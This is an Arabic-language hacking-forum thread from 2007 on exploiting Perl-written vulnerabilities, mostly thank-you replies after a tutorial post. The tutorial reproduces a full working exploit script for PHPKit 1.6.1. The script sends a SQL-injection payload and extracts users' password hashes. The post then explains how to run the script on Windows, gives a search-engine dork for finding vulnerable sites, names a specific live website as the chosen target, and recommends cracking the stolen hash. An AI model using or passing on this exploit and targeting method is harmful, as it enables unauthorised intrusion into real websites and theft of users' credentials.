منتديات اصحاب كول 

--الوصول السريع للأقسام--

الاغانى والفيديو كليبتحميل الافلامغرائب وطرائف الصورللبنــات فـقـطمقاطع البلوتوثفضـائح فـنـيـه
صور الفنانين والجميلاتكلام في الممنوعالتعارف والاهداءاتتحميل البرامجالنكت والفرفشهالمصــارعة
جرائم وقتل وذبحصور السياراتالهكرز والإختراقالصور و الخلفياتالمسابقاتتحميل العاب
مقاطع الفيديو المضحكة اخبار الرياضةالقسم الإسلامىبرامج والعاب الجوالكلمات في الحباخبار الفنانين

دردش مع اصحاب كول واتعرف على احلى بنات وشباب الان!!!!

 

 

ملحوظه هامة:- لايمكنكم المشاركه وقراءه المواضيع مع اصحاب كول الا بعد الإشتراك بالمنتدي

    ::للإشتراك بالمنتدي اضغط هنا:: (من فقد عضويته او الباص ورد الخاص به هنا )

 

 غرائب و عجائب

صور مخله بالاداب ومثيره    -    كمال أجسام السيدات بالصور أتفرجوا علي الحلاوة       -  صور الفنانات بعد عمليات التكبير ف ال .....

    شاهد الان من هنا اجمل واحدث صور نانسى وهيفاء واليسا ومريام فارس    فسر الان حلمك معنا

جرائم و عنف

المراهقات في الجيش الاسرائيلى بالصور  -  صور للكبار فقط  -  صور نساء عربيات في وضع يخجل منه كل عربى
احدث الفيديو كليب العربى والاجنبى - احلى اهداف كرة القدم - تحميل المسلسلات - اغانى سعودية


العودة   منتديات اصحاب كول > =----> ( الهـكـرز والإختــراق ) <----= > اختراق المواقع

رد
 
أدوات الموضوع طرق عرض الموضوع
  #1  
قديم 04-12-2007, 06:59 PM
gold-fire gold-fire غير متصل
عضــــو جـــديد
 
تاريخ التسجيل: Apr 2007
المشاركات: 4
افتراضي شرح طريقة استغلال ثغرات البيرل+ثغرة مثال

بسم الله الرحمن الرحيم
السلام عليكم ..
اليوم شباب حشرح لكم طريقة استغلال ثغرات البيرل وعلى فكرة يا شباب فى ناس الانانية فى طبعهم تدخل تستفيد و من غير ان تضع كلمة شكر على الموضوع او على الاقل تفيد بأى معلومة جديدة يا ريت اشوف ردودكم و استفسارتكم
ندخل فى الجد بقى
طبعآ درس اليوم بيتكلم عن طريقة استغلال الثغرات المكتوبة بالغة من احد اللغات المعروفة و القوية ايضآ و هى لغة البيرل .. قبل ان نبدآ يجب ان نتعلم شىء مهم و هو كيفية معرفة الثغرات المكتوبة بالغة البيرل ..؟
عندما ننظر الى اى كود و نجد فى بدايتة:
رمز:
#!/usr/bin/perl
اذآ علينا ان نعلم ان الثغرة التى سوف نتعامل معها هى احدى الثغرات المكتوبة بلغة البيرل ..
طريقة الاستغلال :
ــــــــــــــــــــــــــــــــــ
اولا:: اذا كنتم من مستخدمين بيئة الليونكس فهذا شىء ممتاز جدآ و لا حاجة لاى برنامج و اعتقد ايضآ انكم لستو فى حاجة لقرأة هذى الدرس .
اما اذا كنتم من مستخدمى بيئة الويندوز فعليكم بأستخدم برنامج ActivePerl
و ذالك لعمل كوبيلر لاكواد البيرل .
و هذة وصلة للبرنامج ::وصلة التحميل

الان بعد تحميل البرنامج و عمل Setup لة على الجهاز سوف يكون على هذا المسار .

رمز:
C:\Perl
الان كل شىء تمام نبدآ العمل
بعد ان نجد احد الثغرات مثال حناخد كمثال احد الثغرات
رمز:
#!/usr/bin/perl

use IO::Socket;

print q{
-----------------------------------------------
PHPKit 1.6.1 exploit by x23 ~ phcn.ws ~ geek-network.de
use: phpkit161.pl [server] [dir] [vic_id]
sample:
$ perl phpkit161.pl localhost /phpkit/ 1
-----------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";

print "~ exploiting\n";
print $sock "POST ".$directory."popup.php?path=misc/finduser.php HTTP/1.1\r\n";
print $sock "Host: $webpage\r\n";
print $sock "Keep-Alive: 300\r\n";
print $sock "(anti-spam-content-type:) application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length("search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1")."\r\n\r\n";

print $sock "search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~/<option value="([0-9a-f]{32})">/) {
     print "~ hash: $1\n";
     close($sock);
     exit();
     break;
  }
}

close($sock);

# milw0rm.com [2006-11-04]
اول شىء نعملة بعد معرفتنا ان هذا الكود لاحد ثغرات البيرل هو اننا نأخد الكود كلة Copy ونضعة Past فى الـ Notbad و نغلقها حيطلب منك عمل Save نضغط على كلمة Yes الان لدينا الكود على هيئة txt علينا ان نغير الامتداد من txt الى pl نفترض اننا سوف نقوم بتسمية الملف exploit.txt علينا ان نغير txt ليصبح بهذا الشكل exploit.pl الان و بعد التأكد من اتمام هذة العملية بنجاح علينا ان ضع الملف exploit.pl داخل الملف bin على هذا المسار




و بعد و ضع الملف داخل هذا المجلد نذهب الى الـ Run الموجودة ضمن قائمة Start و نكتب cmd سيظهر لنا شاشة الدوس بهذا الشكل :




و بعد ان يتم عمل الترجمة لملف البيرل و يفتح امامنا سوف نشاهد طريقة الاستخدام الخاص لهذة الثغرة و كل ثغرة لها طريقة الاستخدام الخاصة بها و فى مثالنا هذا



للبحت عن المواقع المصاب فية www.google.com
رمز:
erstellt mit PHPKIT Version 1.6.1
اما انا فخترت هدا الموقع www.silent-angels-webcenter.de/phpkit



لم يبقى سوى كسر تشفير كلمة الرور ببرامج كسر تشفير او موقع www.milw0rm.com/cracker




اخوكم gold-fire
رد باقتباس
  #2  
قديم 04-13-2007, 01:18 PM
azagorath666 azagorath666 غير متصل
عضــــو جـــديد
 
تاريخ التسجيل: Apr 2007
المشاركات: 9
افتراضي

very nice ,have u ever used metasploit project .if u dont know what is it i can explain. it to u and tell u where to get it .u must use linux for it

thanks
hacker from USA
رد باقتباس
  #3  
قديم 04-22-2007, 03:26 PM
gold-fire gold-fire غير متصل
عضــــو جـــديد
 
تاريخ التسجيل: Apr 2007
المشاركات: 4
افتراضي

وين الردود
__________________
[IMG][/IMG]
رد باقتباس
  #4  
قديم 05-03-2007, 11:31 AM
صورة رمزية sika_love
sika_love sika_love غير متصل
عضـــو نشيــــط
 
تاريخ التسجيل: Apr 2007
المشاركات: 111
افتراضي

مشكورررررررررررررررر
رد باقتباس
  #5  
قديم 06-03-2007, 02:54 PM
صورة رمزية احمد شيكو ملك الشات
احمد شيكو ملك الشات احمد شيكو ملك الشات غير متصل
عضـــو نشيــــط+عضـــو متميز+ عضــو فضــى+عضو زهبى + عضو ماسى
 
تاريخ التسجيل: Apr 2007
المشاركات: 924
افتراضي

مشكوووووووووووووررررررررررررر
رد باقتباس
  #6  
قديم 01-31-2009, 04:39 AM
محمد رحال محمد رحال غير متصل
عضــــو جـــديد
 
تاريخ التسجيل: Nov 2006
المشاركات: 2
افتراضي

مشكوررررررررررررررررررررر
رد باقتباس
  #7  
قديم 03-13-2009, 05:29 PM
صورة رمزية creative2010
creative2010 creative2010 غير متصل
عضــــو جـــديد
 
تاريخ التسجيل: Mar 2009
المشاركات: 13
افتراضي

شكرا على الشرح
يس عندي الصورتبع الشرح ماظهرت
يا ترى ليش؟
و جزاك الله خيرا
رد باقتباس
رد

أدوات الموضوع
طرق عرض الموضوع

تعليمات المشاركة
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is متاحة
رمز [IMG] متاحة
رمز HTML معطلة



الساعة الآن: 04:13 PM.

Tags:-افلام,اغانى,تحميل اغانى,تحميل افلام,تحميل فيلم,تحميل اغنية,الجديد,الجديدة,تحميل البوم,طرب,صور,صور الفنان,صور الفنانة,موقع فيلم,العاب,لعبة,تحميل لعبة,برنامج,تحميل برنامج,رقص,فيديو كليب,تحميل كليب,تحميل فيديو,بلوتوث,صور الفنانة,فضائح,فضيحة,فضائح فنية,صور الفنانات

مواقع دردشةمواقع افلامرسائلمواقع بناتصورتحميل العاب بناتمواقع اغانىمواقع اسلاميةافلام عربية
2009اقسام الدليلمواقع صورمواقع برامجمواقع العابمواقع فيديومواقع شاتدليل مواقعافلام اجنبية

Powered by vBulletin V3.8.4. Copyright ©2000 - 2009